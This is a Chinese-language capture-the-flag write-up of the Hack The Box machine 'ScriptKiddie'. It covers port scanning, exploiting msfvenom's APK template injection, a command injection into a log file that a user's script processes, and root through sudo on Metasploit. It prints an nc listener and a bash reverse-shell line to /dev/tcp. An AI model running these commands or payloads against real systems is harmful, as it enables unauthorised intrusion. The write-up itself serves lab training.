HTB ScriptKiddie
简介
靶机名为脚本小子,os为Linux,难度不高
信息收集
nmap --min-rate 10000 -sV -p- 10.10.10.226
22和5000端口开放,可以看到运行着werkzeug,是一个WSGI工具包,首先查看一下是否存在已知的洞,发现并不适用。直接访问一手。
发现是一个工具库。漏洞就在其中。
漏洞寻找
首先看看nmap,发现时7.8,没什么可以利用的。
Venom看看有没有什么可利用的。
发现存在apk模版注入。
漏洞利用
msf利用起来。
发现只需要两个参数,监听地址和端口,直接输入HTB的地址就可以,默认端口是4444。exploit后会生成apk文件。
首先nc监听4444端口。
nc -lvvp 4444
利用生成的apk完成连接,os选择安卓,地址填入lhost,generate。
获得shell。
GetFlag
首先查看目录下有什么好东西不,发现了userflag。
在home下发现两个用户,whoami发现当前用户是kid,查看另一个用户pwn。建议连接直接用bash。
打开.sh文件,发现是一个脚本。
语句为真时执行nmap的扫描语句,否则将信息写入hackers文件。
断网了,第二天换个ip,直接利用一下,注意echo后的两个空格,调整注入的内容,可以自己试一试就会发现问题所在。
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.85/1234 0>&1' #" >> hackers
nc连接。
此时我们要注意这个用户是否拥有带有root命令的权限,sudo -l发现可以以root执行msf。
自然不必多说,打开msf,拿到root的flag。
总结
正如靶机题目所言,只需要找到漏洞点msfvenom就可以成功打入,并不是很难。